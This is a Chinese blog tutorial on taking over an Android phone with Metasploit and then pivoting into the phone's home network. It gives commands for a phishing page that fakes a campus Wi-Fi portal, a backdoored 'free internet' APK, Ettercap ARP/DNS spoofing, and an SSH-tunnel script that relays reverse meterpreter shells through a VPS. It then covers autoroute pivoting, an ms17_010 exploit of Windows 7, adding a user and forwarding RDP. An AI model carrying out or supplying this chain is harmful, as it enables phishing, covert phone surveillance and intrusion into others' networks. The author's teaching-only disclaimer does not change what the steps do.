實戰:MSF外網持久控制Android手機並滲透測試局域網

DNS Windows 7 網絡安全 YunOS BIT澤清 2017-06-10

* 本文作者:求一份網絡安全實習,本文章中提及的工具和技術方法僅供安全教學用途,禁止非法使用

以前經常看我的文章的粉絲們,相信都多多少少的學到了不少東西,現在想給入門的小夥伴們提供一點微小的幫助。以前老是不知道如何在外網使用msf這個神器,自己查了查資料,總結了一點自己的認識。

0. 環境:

a) Kali 2.0 (咖啡廳:192.168.0.2/校園網:172.16.X.X)

i. Metasploit-Framework

ii. Ettercap(dns欺騙)

iii. Backdoor-apk(apk後門)

iv. Python -m SimpleHTTPServer 80 (輕量級HTTP服務器)

v. SSH Tunnel (外網打洞)

b) Vultr vps 一臺(Ubuntu 14.04)(公網IP:45.77.xx.xx)

echo GatewayPorts yes>>/etc/ssh/sshd_config

c) Android (魅藍E2 Flyme by Yunos )( 咖啡廳:192.168.0.3/家庭局域網:192.168.0.3)

d) Win7 x64 sp1(ms17_010)(家庭局域網:192.168.0.5)

示意圖:

實戰:MSF外網持久控制Android手機並滲透測試局域網

實戰:MSF外網持久控制Android手機並滲透測試局域網

1. 構造釣魚頁面

a) 首先我們在電腦上登錄CMCC-EDU

b) 彈出一個頁面

實戰:MSF外網持久控制Android手機並滲透測試局域網

c) 這個頁面會提示下載一個 免費上網1.pak .我們正好用它來製作後門

d保存該頁面到桌面, 將 免費上網.html 重命名為 index.html 並放到 免費上網_files 文件夾中,然後修改HTML:,

替換頁面所有apk地址為免費上網.apk,並添加<iframe src=”免費上網.apk”>

實戰:MSF外網持久控制Android手機並滲透測試局域網

e) python -m SimpleHTTPServer 80 #(在index.html所在文件夾直接啟動HTTP服務)

2. 使用backdoor-apk製作apk後門

a) 現在我們git clone https://github.com/dana-at-cp/backdoor-apk.git

b)cd backdoor-apk-master/backdoor-apk

c) 將 免費上網1.apk 複製到此目錄 並且重命名為 mfsw.apk

實戰:MSF外網持久控制Android手機並滲透測試局域網

d).

/backdoor-apk.sh mfsw.apk

e) payload 選擇 3

f) lhost 填寫 vps 的IP地址 45.77.XX.XX

g) lport填寫 99 (vultr 會封掉一部分端口,比如默認的4444)

實戰:MSF外網持久控制Android手機並滲透測試局域網

h) 然後進入 original/dist 複製mfsw.apk 到 免費上網_files 那個包含我們釣魚文件的文件夾,改名為 免費上網.apk

實戰:MSF外網持久控制Android手機並滲透測試局域網

實戰:MSF外網持久控制Android手機並滲透測試局域網

3. Ettercap 實現 DNS 欺騙

a) 查看ifconfig

實戰:MSF外網持久控制Android手機並滲透測試局域網

b)

gedit /etc/ettercap/etter.dns

* A 192.168.0.2

* PTR 192.168.0.2

實戰:MSF外網持久控制Android手機並滲透測試局域網

c) 開啟ettercap-gui 選擇wlan0

實戰:MSF外網持久控制Android手機並滲透測試局域網

實戰:MSF外網持久控制Android手機並滲透測試局域網

e) 選擇誘導 192.169.0.1 和 192.169.0.3 (Android)

f) 開啟Arpspoof

實戰:MSF外網持久控制Android手機並滲透測試局域網

實戰:MSF外網持久控制Android手機並滲透測試局域網

g) 加載dns sproof 模塊

實戰:MSF外網持久控制Android手機並滲透測試局域網

h) 手機上如圖:

實戰:MSF外網持久控制Android手機並滲透測試局域網

實戰:MSF外網持久控制Android手機並滲透測試局域網

實戰:MSF外網持久控制Android手機並滲透測試局域網

4. msf 通過SSHtunnel 接收 反彈meterpreter 會話

a) 下面我們切換kali連接到其他wifi,

ifconfig 查看一下當前kali ip

實戰:MSF外網持久控制Android手機並滲透測試局域網

現在的地址為 172.16.8.181 ,大家等下還是能接收到來自Android的會話

b)

vi sshTunnel

c)

#!/bin/bashif [ -n “$1” ]#判斷參數$1是否為空then echo 0.0.0.0 $1”--<>--”45.77.xx.xx:$1ssh -C -g [email protected] -R $1:127.0.0.1:$1#這裡是相同端口是因為,msf監聽不到45.77.xx.xx:$1 會自動監聽0.0.0.0:$1,剛好能正常接收會話elseecho0.0.0.099”--<>--”45.77.xx.xx99 ssh -C -g [email protected] -R 99:127.0.0.1:99#默認監聽99端口 fi

實戰:MSF外網持久控制Android手機並滲透測試局域網

d) chmod +x sshTunnel

e) ./sshTunnel #默認99端口,運行sshtunnel 來實現 vps:99 到 127.0.0.1:99的轉發

f) 其實這裡已經有會話反彈過來了,只是本地msf監聽沒有開啟

實戰:MSF外網持久控制Android手機並滲透測試局域網

g) 現在我們開啟msf監聽

cd backdoor-apk/backdoor-apk/ msfconsole -r backdoor-apk. rc

實戰:MSF外網持久控制Android手機並滲透測試局域網

h) 可以看到會話已經建立

實戰:MSF外網持久控制Android手機並滲透測試局域網

i) session #查看

j) wakelock #保持喚醒防止掉線

k) session -i 1 #切換到meterpreter

實戰:MSF外網持久控制Android手機並滲透測試局域網

l) 截個圖錄個音啥的都不是事,能中招的用戶肯定會給權限的,畢竟不是所有人都是有安全意識

實戰:MSF外網持久控制Android手機並滲透測試局域網

m) ifconfig#查看Android的網段

實戰:MSF外網持久控制Android手機並滲透測試局域網

n)

run autoroute -s 192.168.0.3 #添加自動路由background#返回msfconsole

實戰:MSF外網持久控制Android手機並滲透測試局域網

o) 現在msf已經獲得192.168.0.0/24網段的權限

但是我們還是有訪問該網段的權限,掃描一手ms17_010

實戰:MSF外網持久控制Android手機並滲透測試局域網

p) 既然是有ms17_010那就好辦了(為了方便以後控制,加上bind_tcp正向連接成功率會低一點,所以使用reverse_tcp)

實戰:MSF外網持久控制Android手機並滲透測試局域網

實戰:MSF外網持久控制Android手機並滲透測試局域網

實戰:MSF外網持久控制Android手機並滲透測試局域網

實戰:MSF外網持久控制Android手機並滲透測試局域網

實戰:MSF外網持久控制Android手機並滲透測試局域網

實戰:MSF外網持久控制Android手機並滲透測試局域網

q) sshtunnel 打洞,45.77.xx.136:88->127.0.0.1:88

實戰:MSF外網持久控制Android手機並滲透測試局域網

s) 這裡win7 x64會重啟,然後獲得會話,可以看到win7的會話也被vps轉發回來了

輸入shell,進行添加用戶,這裡也可以用 run getgui -e -u admin -p 123

實戰:MSF外網持久控制Android手機並滲透測試局域網

v) 下面我們可以使用

protfwd add -l 1234 -r 192.168.0.5 -p 3389

將win7的遠程桌面轉發到本地1234端口

實戰:MSF外網持久控制Android手機並滲透測試局域網

w) get it!

實戰:MSF外網持久控制Android手機並滲透測試局域網

本文由@頭條號“BIT澤清”獨家發佈,轉載請註明轉載地址

相關推薦

推薦中...